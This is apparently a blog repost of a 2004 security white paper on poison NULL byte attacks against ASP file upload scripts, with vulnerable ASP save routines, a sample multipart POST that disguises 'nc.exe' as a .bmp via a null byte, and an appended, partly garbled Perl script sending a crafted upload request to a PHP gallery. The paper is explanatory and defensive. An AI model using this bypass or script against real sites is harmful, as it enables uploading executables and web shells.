0x00 vs ASP file upload scripts

原创 2004年07月21日 21:34:00

Copyright Security-Assessment.com Ltd 2004
White Paper
Title: 0x00 vs ASP file upload scripts
Prepared by: Brett Moore
Network Intrusion Specialist
Date: 13 July 2004
13/07/2004 Page 2 of 7
Copyright Security-Assessment.com Ltd 2004
The affects of the `Poison NULL byte` have not been widely explored in ASP, but
as with other languages the NULL byte can cause problems when ASP passes
data to objects.
Many upload systems written in ASP suffer from a common problem whereby a
NULL byte can be inserted into the filename parameter leading to any extension,
after the null byte, being ignored when writing the file.
This means that in some cases it is possible to bypass checks for valid
extensions, even if one is appended by the application.
This is very similar to attacks against perl and PHP, the difference being how the
null byte is sent to the application.
This problem arises when data is compared and validated in ASP script but
passed to the FileSystemObject without checking for NULL bytes.
This document will discuss how ASP upload scripts can be affected by the Poison
NULL byte attack.
The information in this document is based on research done using upload
systems that incorporate multipart/form-data posts and the
Scripting.FileSystemObject object.
Throughout this document we focus on the CreateTextFile method, which is used
to create a file for writing, but it is possible that other objects functions are
vulnerable to the same type of problem.
A %00 or NULL can not be sent through the URL or a normal form post as the
web server registers this as the end of the string, but does not store it in the
filename variable.
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
File Uploading
File uploading is commonly done using an input object of type file and an
encoding type of multipart/form-data.
The content type "application/x-www-form-urlencoded" is inefficient for sending
large quantities of binary data or text containing non-ASCII characters. The
13/07/2004 Page 3 of 7
Copyright Security-Assessment.com Ltd 2004
content type "multipart/form-data" should be used for submitting forms that
contain files, non-ASCII data, and binary data.
A "multipart/form-data" message contains a series of parts, each representing a
successful control. The parts are sent to the processing agent in the same order
the corresponding controls appear in the document stream.

Your Picture:

When submitted the forms data will be sent in the multipart/form-data format. This
allows for the transfer of all bytes, including nulls, within the forms posted data.
Upon receiving the post, the target ASP page needs to process and decode the
posted data into a useable state.

File Saving
At some point in the uploading process, the file will be saved to a file location. The
following is some commonly used code to do this.
Public Sub Save(filename)
Dim objFSO, objFSOFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile = objFSO.CreateTextFile(path + "/" + filename)
End Sub
When the filename parameter is passed to the CreateTextFile() function, it may
contain NULL bytes. This can affect the name of the created file as the
CreateTextFile only reads up to the NULL byte when creating the file.
Set objFSOFile = objFSO.CreateTextFile(path + "/" + filename)
If filename contains a NULL byte, anything after that byte will be ignored.

Null Byte
The NULL byte can be inserted manually through modifications to the multipart
post data using a hex editor, or by using a web proxy.
Multipart Form Post
POST /upload.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
Host: localhost
Content-Length: 359
Pragma: no-cache
Content-Disposition: form-data; name="YourFile"; filename="c:/nc.exe .bmp"
Content-Type: text/plain
Proof Of Upload Test File
Content-Disposition: form-data; name="submit"
The filename parameter of the above post has been changed as such;
N C . E X E (null) . B M P
4E 43 2E 45 58 45 00 2E 42 4D 50
Note that an actual NULL byte (0x00) has been inserted between the .exe and the

Script Tests
The following two file save scripts shown below are examples of upload scripts
where the extension of the written file can be arbitrarily set.
In both cases tFile is the filename parameter passed through the post.

Example One ( File Extension Appending )
Public Sub Save(Path)
Dim objFSO, objFSOFile
Dim lngLoop
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile =
objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile + ".bmp"))
‘ Write the file contents
For lngLoop = 1 to LenB(m_Blob)
objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
End Sub
Example Two ( File Extension Checking )
Public Sub Save(Path)
Dim objFSO, objFSOFile
Dim lngLoop
‘ Check the file extension
if right(tFile,4) <> “.bmp” then exit sub
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile=
objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile))
‘ Write the file contents
For lngLoop = 1 to LenB(m_Blob)
objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
End Sub
13/07/2004 Page 6 of 7
Copyright Security-Assessment.com Ltd 2004
Final Summary
It has commonly been thought that web applications written in ASP are safe from
the problems associated with NULL bytes. While in most instances this is true, it
can be seen here that applications that make use of objects external to the native
ASP scripting language, can be affected by NULL bytes.
It is probable that other objects and areas can also be manipulated to some extent
when their data is collected through a multipart/form-data post.
As in other areas, proper validation of user input is paramount to the security of
web applications. It is therefore important to check input not only for common
attack strings used for folder traversal, but also for NULL bytes before using the
input in the creation of files.

Perl CGI problems - rain.forest.puppy
Bugtraq Post Regarding PHP and null bytes
Forms in HTML documents


测试程序:NEATPIC PHP目录直读版 1.2.3


$| = 1;
use Socket;
$host = "";
$port = "80";

$UploadTo = "";
$str =
"Content-Disposition: form-data; name=/"path/"/r/n".
"Content-Disposition: form-data; name=/"image/"; filename=/"F://tools//1.gif/"/r/n".
"Content-Type: text/plain/r/n".

print $str;
print $len;

$req ="POST /1/1/3721/index.php?action=upload HTTP/1.1/r/n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*/r/n".
"Accept-Language: zh-cn/r/n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472/r/n".
"Accept-Encoding: gzip, deflate/r/n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar; .NET CLR 1.1.4322)/r/n".
"Content-Length: $len/r/n".
"Connection: Keep-Alive/r/n".
"Cache-Control: no-cache/r/n".
"Cookie: PHPSESSID=111111111111111111111111/r/n".
print $req;
@res = sendraw($req);
print @res;

#Hmm...Maybe you can send it by other way

sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems/n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems/n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
    $| = 1;
        print $req;
    my @res = <S>;
        return @res;
    else {
    die("Can't connect.../n");


  • yongh701
  • yongh701
  • 2016年01月20日 17:09
  • 4354


原题内容: bypass the upload 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/upload  首先随手上传了一个图片, ...
  • wy_97
  • wy_97
  • 2017年08月01日 18:14
  • 3053

jquery File Upload 插件应用之同时递交form field与多个文件

之前有一文章讨论如何用jquery File Upload(http://blueimp.github.io/jQuery-File-Upload/) 上传文件并取得返回的json对象. http:/...
  • rocklee
  • rocklee
  • 2016年11月19日 15:33
  • 1823

jquery File Upload 插件应用之解析返回json对象

后端用spring mvc+module: Controller: @AuthPassport @RequestMapping("/EAF301L1/upload/{appno}/{rev}")...
  • rocklee
  • rocklee
  • 2016年10月08日 18:01
  • 2910

jQuery File Upload 多文件 单击选中或多选文件直接自动上载 无需提交按钮

jQuery-File-Upload 插件地址:https://github.com/blueimp/jQuery-File-Upload 激活按钮,你可以用  CSS 绘制你喜欢的效果 se...
  • joyous
  • joyous
  • 2016年09月23日 21:13
  • 3579


首先,文件上传需要使用FileUpload控件,针对于此控件我们来进行一系列的操作。 1、将选中文件上传到目标位置: //获取上传文件的文件名称 string name = File...
  • xianglikai1
  • xianglikai1
  • 2016年07月30日 22:18
  • 1074

jquery-file-upload 文件上传,带进度条

ssssssssssssssssss $('#file_upload').fileupload({ dataType: 'json', url:...
  • ht99582
  • ht99582
  • 2014年11月14日 14:16
  • 3458

rails 不刷新上传文件jquery-fileupload-rails包的简易使用

Gemfile文件: gem 'jquery-fileupload-rails'spplication.js: //= require jquery-fileupload/basic 其实//= re...
  • yc1022
  • yc1022
  • 2014年01月23日 17:41
  • 2321


  • vjudge
  • vjudge
  • 2014年07月23日 23:43
  • 1222

asp.net mvc 3.0详细笔记__06__项目文件结构详解_Content和Scripts

  • DHCsimida
  • DHCsimida
  • 2013年12月28日 11:31
  • 1103
您举报文章:0x00 vs ASP file upload scripts